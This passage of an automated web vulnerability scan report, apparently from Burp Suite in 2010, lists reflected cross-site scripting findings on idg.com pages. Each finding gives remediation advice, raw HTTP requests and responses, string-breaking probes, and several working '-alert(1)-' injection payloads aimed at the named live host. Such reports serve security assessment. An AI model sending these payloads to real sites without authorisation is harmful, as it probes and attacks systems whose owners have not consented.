<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/intl_media_contacts?c7654"-alert(1)-"8faa41383a4=1");
} catch(err) {}</script>
...[SNIP]...

2.158. http://idg.com/www/HomeNew.nsf/docs/licensing [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/licensing

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98663"%3b8f87c12c52b was submitted in the REST URL parameter 1. This input was echoed as 98663";8f87c12c52b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www98663"%3b8f87c12c52b/HomeNew.nsf/docs/licensing HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:45 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5018
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www98663";8f87c12c52b/HomeNew.nsf/docs/licensing");
} catch(err) {}</script>
...[SNIP]...

2.159. http://idg.com/www/HomeNew.nsf/docs/licensing [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/licensing

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13870"%3b6ce10bb9cb9 was submitted in the REST URL parameter 3. This input was echoed as 13870";6ce10bb9cb9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs13870"%3b6ce10bb9cb9/licensing HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:46 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5018
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs13870";6ce10bb9cb9/licensing");
} catch(err) {}</script>
...[SNIP]...

2.160. http://idg.com/www/HomeNew.nsf/docs/licensing [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/licensing

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ceb7b"%3b0088f227736 was submitted in the REST URL parameter 4. This input was echoed as ceb7b";0088f227736 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/licensingceb7b"%3b0088f227736 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:46 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5018
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/licensingceb7b";0088f227736");
} catch(err) {}</script>
...[SNIP]...

2.161. http://idg.com/www/HomeNew.nsf/docs/licensing [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/licensing

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13bc5"-alert(1)-"d146ca2428f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/licensing?13bc5"-alert(1)-"d146ca2428f=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:44 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5031
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/licensing?13bc5"-alert(1)-"d146ca2428f=1");
} catch(err) {}</script>
...[SNIP]...

2.162. http://idg.com/www/HomeNew.nsf/docs/media_contacts [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/media_contacts

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df79a"%3b4f588bb5d0f was submitted in the REST URL parameter 1. This input was echoed as df79a";4f588bb5d0f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwdf79a"%3b4f588bb5d0f/HomeNew.nsf/docs/media_contacts HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:56 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5023
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwdf79a";4f588bb5d0f/HomeNew.nsf/docs/media_contacts");
} catch(err) {}</script>
...[SNIP]...

2.163. http://idg.com/www/HomeNew.nsf/docs/media_contacts [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/media_contacts

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c628"%3bee9e83583b7 was submitted in the REST URL parameter 3. This input was echoed as 4c628";ee9e83583b7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs4c628"%3bee9e83583b7/media_contacts HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:58 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5023
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs4c628";ee9e83583b7/media_contacts");
} catch(err) {}</script>
...[SNIP]...

2.164. http://idg.com/www/HomeNew.nsf/docs/media_contacts [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/media_contacts

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 822d1"%3bdea83ac2b79 was submitted in the REST URL parameter 4. This input was echoed as 822d1";dea83ac2b79 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/media_contacts822d1"%3bdea83ac2b79 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:59 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5023
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/media_contacts822d1";dea83ac2b79");
} catch(err) {}</script>
...[SNIP]...

2.165. http://idg.com/www/HomeNew.nsf/docs/media_contacts [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/media_contacts

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c6f9"-alert(1)-"5d8d1380fbf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/media_contacts?6c6f9"-alert(1)-"5d8d1380fbf=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:56 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5036
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/media_contacts?6c6f9"-alert(1)-"5d8d1380fbf=1");
} catch(err) {}</script>
...[SNIP]...

2.166. http://idg.com/www/HomeNew.nsf/docs/news_service_bureaus [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/news_service_bureaus

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9811"%3b45302619bdf was submitted in the REST URL parameter 1. This input was echoed as d9811";45302619bdf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwd9811"%3b45302619bdf/HomeNew.nsf/docs/news_service_bureaus HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:00 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5029
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwd9811";45302619bdf/HomeNew.nsf/docs/news_service_bureaus");
} catch(err) {}</script>
...[SNIP]...

2.167. http://idg.com/www/HomeNew.nsf/docs/news_service_bureaus [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/news_service_bureaus

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98ce6"%3b23bcf83f2d1 was submitted in the REST URL parameter 3. This input was echoed as 98ce6";23bcf83f2d1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs98ce6"%3b23bcf83f2d1/news_service_bureaus HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:04 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5029
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs98ce6";23bcf83f2d1/news_service_bureaus");
} catch(err) {}</script>
...[SNIP]...

2.168. http://idg.com/www/HomeNew.nsf/docs/news_service_bureaus [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/news_service_bureaus

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bffb4"%3bd6c5830b776 was submitted in the REST URL parameter 4. This input was echoed as bffb4";d6c5830b776 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/news_service_bureausbffb4"%3bd6c5830b776 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:06 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5029
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/news_service_bureausbffb4";d6c5830b776");
} catch(err) {}</script>
...[SNIP]...

2.169. http://idg.com/www/HomeNew.nsf/docs/news_service_bureaus [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/news_service_bureaus

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d083c"-alert(1)-"cac8eda3971 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/news_service_bureaus?d083c"-alert(1)-"cac8eda3971=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:59 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5042
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/news_service_bureaus?d083c"-alert(1)-"cac8eda3971=1");
} catch(err) {}</script>
...[SNIP]...

2.170. http://idg.com/www/HomeNew.nsf/docs/videos [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/videos

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd6d8"%3b00f260e3c22 was submitted in the REST URL parameter 1. This input was echoed as cd6d8";00f260e3c22 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwcd6d8"%3b00f260e3c22/HomeNew.nsf/docs/videos HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:47 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5015
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwcd6d8";00f260e3c22/HomeNew.nsf/docs/videos");
} catch(err) {}</script>
...[SNIP]...

2.171. http://idg.com/www/HomeNew.nsf/docs/videos [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/videos

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1273"%3b9d5f30a9adf was submitted in the REST URL parameter 3. This input was echoed as f1273";9d5f30a9adf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docsf1273"%3b9d5f30a9adf/videos HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:48 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5015
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docsf1273";9d5f30a9adf/videos");
} catch(err) {}</script>
...[SNIP]...

2.172. http://idg.com/www/HomeNew.nsf/docs/videos [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/videos

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7a55"%3b0124ac27839 was submitted in the REST URL parameter 4. This input was echoed as e7a55";0124ac27839 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/videose7a55"%3b0124ac27839 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:48 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5015
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/videose7a55";0124ac27839");
} catch(err) {}</script>
...[SNIP]...

